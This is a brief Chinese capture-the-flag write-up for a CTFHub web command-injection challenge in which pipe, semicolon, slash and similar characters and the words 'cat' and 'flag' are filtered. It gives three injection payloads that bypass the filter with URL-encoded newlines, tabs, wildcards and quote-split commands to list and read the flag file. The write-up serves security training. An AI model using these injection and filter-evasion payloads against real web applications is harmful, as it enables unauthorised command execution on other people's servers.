CTFHUB-web-RCE-综合过滤练习

开启题目

查看网页源代码发现这次网页对 | 、 && 、 || 、 \ 、 / 、; ,都进行了过滤处理

发现换行符 %0a 和回车符 %0d 可以进行测试,在 URL 后面拼接访问

复制代码
127.0.0.1%0als

用 ls flag_is_here 查看 flag 文件中的内容,发现回显为空,发现网页源代码中还过滤了几个字符,分别是 cat 、 flag 、 ctfhub ,这里尝试使用 %09 ( URL 编码中 表示 Tab 制表符)加上通配符进行绕过

复制代码
127.0.0.1%0als%09*here
复制代码
127.0.0.1%0acd%09*here%0ac%27a%27t%09*_31687958414358.php
相关推荐
来旺1 小时前
互联网大厂Java面试全解析及三轮问答专项
java·数据库·spring boot·安全·缓存·微服务·面试
我要学习别拦我~1 小时前
桑基图、弦图、旭日图:如何表现复杂流向关系
经验分享·信息可视化·数据可视化
Brianna Home2 小时前
博客安全攻防演练:从攻击者视角构筑铜墙铁壁
网络·数据库·安全·oracle
聪明的笨猪猪3 小时前
Java JVM “类加载与虚拟机执行” 面试清单(含超通俗生活案例与深度理解)
java·经验分享·笔记·面试
施嘉伟4 小时前
SQL Server安全配置全面检查与优化方案
数据库·安全
つ 派小星4 小时前
windows10激活解决办法
经验分享
Andya_net4 小时前
网络安全 | SSL/TLS 证书文件格式详解:PEM、CRT、CER、DER、PKI、PKCS12
安全·web安全·ssl
newxtc10 小时前
【昆明市不动产登记中心-注册安全分析报告】
人工智能·安全
bmcyzs11 小时前
【展厅多媒体】触摸查询一体机实现数据可视化
经验分享·科技·信息可视化·数据挖掘·数据分析·设计规范